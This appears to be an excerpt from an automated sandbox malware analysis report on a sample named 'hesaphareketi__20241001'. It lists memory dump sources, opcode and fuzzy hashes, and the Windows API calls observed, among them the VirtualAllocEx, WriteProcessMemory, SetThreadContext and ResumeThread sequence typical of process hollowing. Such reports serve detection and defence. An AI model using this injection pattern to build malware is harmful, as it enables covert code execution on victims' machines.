                                        • Snapshot File: hcaresult_0_2_55d0000_hesaphareketi__20241001.jbxd
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aede108890c383a5bad3ebf0d4db4eb610b1e051ecc2f6afd7793fbac281f4b3
                                        • Instruction ID: 1e661b4c227dc776c57d11f984d38e5509819d9053a59ad70ae40c92400db2b4
                                        • Opcode Fuzzy Hash: aede108890c383a5bad3ebf0d4db4eb610b1e051ecc2f6afd7793fbac281f4b3
                                        • Instruction Fuzzy Hash: AAE18FB4A2060ADFCB04CF96E4808EEFBB5FF89311F10D56AD516A7254DB349A42CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91a0b38f904e710d41e723ab9596d2e31760b438c0fe95bd23220a3b5e35ee41
                                        • Instruction ID: 7709e2fa0fcce60f24b338f32505a0cac0870051257b497eda62ef74a0354107
                                        • Opcode Fuzzy Hash: 91a0b38f904e710d41e723ab9596d2e31760b438c0fe95bd23220a3b5e35ee41
                                        • Instruction Fuzzy Hash: E1D119B492460ADFCB04CFA6D4858EEFBB2FF89300F14D565D416AB255DB34AA42CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42e27481a640f1ba8962a0df83a7766f672cc1d7b17d8a7f21d5f2eeddfd032e
                                        • Instruction ID: ea042a98db3a474fbc6cfe7930a896675f775b68351355b2c03f10e7414aeabf
                                        • Opcode Fuzzy Hash: 42e27481a640f1ba8962a0df83a7766f672cc1d7b17d8a7f21d5f2eeddfd032e
                                        • Instruction Fuzzy Hash: 99D1F8B4D2560ADFCB04CFA6D4818AEFBB2FF89300F54D565D416AB254DB34AA42CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d74abc2c150c4f0354bf95217d1715329b1cb76db42b6240cece1d45ff380b5
                                        • Instruction ID: d68f7ec571345ebadd1f99c80ed3b5742c08f2fd4e721e533efc32e52e1fca40
                                        • Opcode Fuzzy Hash: 4d74abc2c150c4f0354bf95217d1715329b1cb76db42b6240cece1d45ff380b5
                                        • Instruction Fuzzy Hash: 1BC10BB4D2160ADFCB04CF96D4818EEFBB2FF89301B54D565D416A7254DB34AA42CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90e73895f45e16a9e816d36cdd27c1e3384414a77b0cc10bf484e022d8e7b260
                                        • Instruction ID: 5b2c97cbc5640e957ebe3fd4907e8e7a067e975c730f614e477893f3a7309464
                                        • Opcode Fuzzy Hash: 90e73895f45e16a9e816d36cdd27c1e3384414a77b0cc10bf484e022d8e7b260
                                        • Instruction Fuzzy Hash: 7EB105B1D14219DFDB18CFAAD9805DEFBF2BF89210F20D52AD415AB264EB349902CF54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9f4cdc78e31f7e5d67eb9834285c70ac2f81b5103da6a969dbfc98170d270c6
                                        • Instruction ID: fffd0871405420d7c53755cc194ccf4efdd15106b7676429df6024209f40066c
                                        • Opcode Fuzzy Hash: f9f4cdc78e31f7e5d67eb9834285c70ac2f81b5103da6a969dbfc98170d270c6
                                        • Instruction Fuzzy Hash: 57B1F5B1E14219DFDB18CFAAD9805DEFBF2BF89210F10D52AD415AB264EB349912CF14
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf1e2e8706ba34cf9079e89a635b726ca0222029ae5a30a01a1a3c360619239e
                                        • Instruction ID: 19c190c21b3da3a5038e0a21905546d4a8304343338416fdd9942e9c0df295cf
                                        • Opcode Fuzzy Hash: cf1e2e8706ba34cf9079e89a635b726ca0222029ae5a30a01a1a3c360619239e
                                        • Instruction Fuzzy Hash: 1B71D2B0D15209DFCB04CFAAE5859DEFBB2FB89350F10D42AE516AB264DB349942CF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c4771f8a5f3532874c967947bf3b99c55286ea2bf1b90a3a464d790db6c4ca8
                                        • Instruction ID: 9a0f9ae51df285a8af7172cd686fe240a9cc5118233d8cf577d96c03f6bc9118
                                        • Opcode Fuzzy Hash: 8c4771f8a5f3532874c967947bf3b99c55286ea2bf1b90a3a464d790db6c4ca8
                                        • Instruction Fuzzy Hash: 3E71F4B4E15209DFDB04CFAAE4859DEFBB2FB89340F10D42AE416AB264DB349941CF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48175d94e30e102e751e2a1f11e58c6d2bbcd76b5425db263002bba85f8fcd5b
                                        • Instruction ID: ad5c536de7736be45f552cc5dd529e2b849a3e74c43d015e0dcfe79c5f900d39
                                        • Opcode Fuzzy Hash: 48175d94e30e102e751e2a1f11e58c6d2bbcd76b5425db263002bba85f8fcd5b
                                        • Instruction Fuzzy Hash: 9F51F4B4E14219DFCB08CFA5E8855EEFBF2FB8A300F10956AE415A7254DB346911CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 095b23d434f9aa7a97e96632ba2decd7d59d3ddf4a306153d21f85608fc002c2
                                        • Instruction ID: 5339c3835fbe0ea5d963eb892a31dcad5049cdd1d0b39509bdf41272e7cfb87f
                                        • Opcode Fuzzy Hash: 095b23d434f9aa7a97e96632ba2decd7d59d3ddf4a306153d21f85608fc002c2
                                        • Instruction Fuzzy Hash: 5251F4B4E14209DFCB04CFA5E8855EEFBF6BB8A300F10D52AE415A7254DB346901CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a242fd2df02e3dc4764ad42ae9efc3a48e0ed4f447af5b9722d54e1ec26e0b75
                                        • Instruction ID: 48b3b82a98276ee4a25ce9fda980d868b5383142d75d11c8f254f2cd23651d17
                                        • Opcode Fuzzy Hash: a242fd2df02e3dc4764ad42ae9efc3a48e0ed4f447af5b9722d54e1ec26e0b75
                                        • Instruction Fuzzy Hash: D6316AB4E04609EFCB08CFA9E98099DFBF2FF89310F14D5A6D419AB365D6319A01DB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3068bcc90881220db74c85ed225692f627cbc48a3cc9e8462cb0bcd0fdab5fa0
                                        • Instruction ID: 769813979474018fe0eaf58100ac4832113243931a32d26b0543cf3acb901cfd
                                        • Opcode Fuzzy Hash: 3068bcc90881220db74c85ed225692f627cbc48a3cc9e8462cb0bcd0fdab5fa0
                                        • Instruction Fuzzy Hash: C021F3B1E006188BEB18CFAAD8447DEFBF6EFC8310F14C06AD409A6254DB355A45CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 914cdcd49152c8e0c6c0199c7f26dadd4f558bf43100b64d3bbe7ecfb18dd5ca
                                        • Instruction ID: 315373049c24db0a74c5b4ee319e672c8403cfd2d0c47b93ad8031e5b62f430c
                                        • Opcode Fuzzy Hash: 914cdcd49152c8e0c6c0199c7f26dadd4f558bf43100b64d3bbe7ecfb18dd5ca
                                        • Instruction Fuzzy Hash: 4B21D4B0E006588BEB18CFAAD8447DEBBF3AFC8300F14C16AD409A6258DB755945CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3d877d451a7cf2c52ea9c71e5dee881c29c9e6a54e150f5696b363cb9756fb4
                                        • Instruction ID: 022d41b7207ea9928b8f29fcb3481ac53a951b6d3305cbf83148662e590d584b
                                        • Opcode Fuzzy Hash: b3d877d451a7cf2c52ea9c71e5dee881c29c9e6a54e150f5696b363cb9756fb4
                                        • Instruction Fuzzy Hash: 91214DB1D156198BDB18CF67D8046EEFFBBBFCA311F04C16AD40966295DB300546DB90

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A34C26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 015DAFFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

                                        Control-flow Graph (figure not reproduced; legend: executed / not executed nodes)
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 015D59C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0

                                        Control-flow Graph (figure not reproduced; legend: executed / not executed nodes)
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 015D59C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0

                                        Control-flow Graph (figure not reproduced; legend: executed / not executed nodes)
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 055D4101
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2163631232.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_55d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0

                                        Control-flow Graph (figure not reproduced; legend: executed / not executed nodes)
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A347F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A347F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A34216
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A348D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015DD656,?,?,?,?,?), ref: 015DD717
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A34216
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A348D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015DD656,?,?,?,?,?), ref: 015DD717
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A34716
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A34716
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A3725D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 015DAFFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A3725D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r
                                        • API String ID: 0-1812594589
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: uIA1
                                        • API String ID: 0-3125954435
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r
                                        • API String ID: 0-1812594589
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: uIA1
                                        • API String ID: 0-3125954435
                                        • Opcode ID: 33a1daa814e5d317b870983f6b8a61693334fa51e66d9f79008325c6164483a2
                                        • Instruction ID: 63d9ea171ca0cf654391348222f6b26dddb09ea7065329b69efb616cfda076ab
                                        • Opcode Fuzzy Hash: 33a1daa814e5d317b870983f6b8a61693334fa51e66d9f79008325c6164483a2
                                        • Instruction Fuzzy Hash: D73143B0E24219DFCB08CFA9D5856AEFBF6FB89300F50D56AD415A7250EB349A41CF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: f4bf11172ddf7283ff81ea0d8563031d8e2ad0e9ed665393201051545edcb2b0
                                        • Instruction ID: f05dd0514f499ac60ab97b86ea4aba1431572def52c5a920d4cd3a2133c0bcb1
                                        • Opcode Fuzzy Hash: f4bf11172ddf7283ff81ea0d8563031d8e2ad0e9ed665393201051545edcb2b0
                                        • Instruction Fuzzy Hash: F81121B1B0060A8BCB54EFB9E9519EEB6F6BFC4611B50407AC515E7244EB358E02CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a23ab0d73136a698ff20964c0620a83a2dbd8df556f3ed5c23de12ee3c9f8f4
                                        • Instruction ID: 05a9040c788145aad48ef956bde3c0286228b03fa29bf7de8853c686a59395ff
                                        • Opcode Fuzzy Hash: 2a23ab0d73136a698ff20964c0620a83a2dbd8df556f3ed5c23de12ee3c9f8f4
                                        • Instruction Fuzzy Hash: EBA1E9B4915268CFDB10CF54E885AEDBBBABF49301F5598D6E80AA7351C731AD82CF10
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff4b46604edc68e29c12a4b279d46bc320b8d93bce328654b128628b8277ccde
                                        • Instruction ID: 83d9822083d4291b54781637c1efb7557c7f6fa128656dbb81d26d55c21139f7
                                        • Opcode Fuzzy Hash: ff4b46604edc68e29c12a4b279d46bc320b8d93bce328654b128628b8277ccde
                                        • Instruction Fuzzy Hash: 174118B4E19209CBDB08CF9AE4456EEBBF6BB8E301F14D069E419A7251DB349941CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f8766edcf9b3b7a966b3445c6e1b956aaace2a8388a3540a16b1706e9d04974
                                        • Instruction ID: 20a75baf64c0f0b3ce65dc44278f6245c1c2db9048698d3c7ae5598c2aad88b7
                                        • Opcode Fuzzy Hash: 1f8766edcf9b3b7a966b3445c6e1b956aaace2a8388a3540a16b1706e9d04974
                                        • Instruction Fuzzy Hash: 8C4119B0D19309CFDB08CFA6E5466EDBBF6BB8A311F14E4AAE409A7251DB344941CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d3f9bf17fa25f4cbd5f2765d984e0916dac4f799b2dd6501f0cf8df98fce011
                                        • Instruction ID: 2bbd94c19d0e15284d6b8f93bc8a6f42b16d34eead71a08a03e7ff4ec57480b1
                                        • Opcode Fuzzy Hash: 3d3f9bf17fa25f4cbd5f2765d984e0916dac4f799b2dd6501f0cf8df98fce011
                                        • Instruction Fuzzy Hash: 414119B4E19249CFDB08CB9AE4456EEBBF6BB8E311F14E06AE409A7251DB344941CE50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3a664819aea4674c65ae9079e0f0516853f417ef8633fd54146e656298e8013
                                        • Instruction ID: 8db610184d54bac717a8ae65ffc283361e0479bde42d79bc53e168c0747960c4
                                        • Opcode Fuzzy Hash: a3a664819aea4674c65ae9079e0f0516853f417ef8633fd54146e656298e8013
                                        • Instruction Fuzzy Hash: FC3137B19002499FCF14DFA9D985ADEBFF9FF48310F10842AE919E7210D735A944CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d83fed4ccec2aa9fd2d278635d6e9ae440659ba316b8b6f53f421a7c6d564259
                                        • Instruction ID: 9d9bdb42c984dc2228b94dada1bab5df7ae7029e1b82962ad9af02ed22421aeb
                                        • Opcode Fuzzy Hash: d83fed4ccec2aa9fd2d278635d6e9ae440659ba316b8b6f53f421a7c6d564259
                                        • Instruction Fuzzy Hash: E83124B4E20219DBDB08CFA9E4455EEBBF6FF89310F10942AE415A7354DB306941CF60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
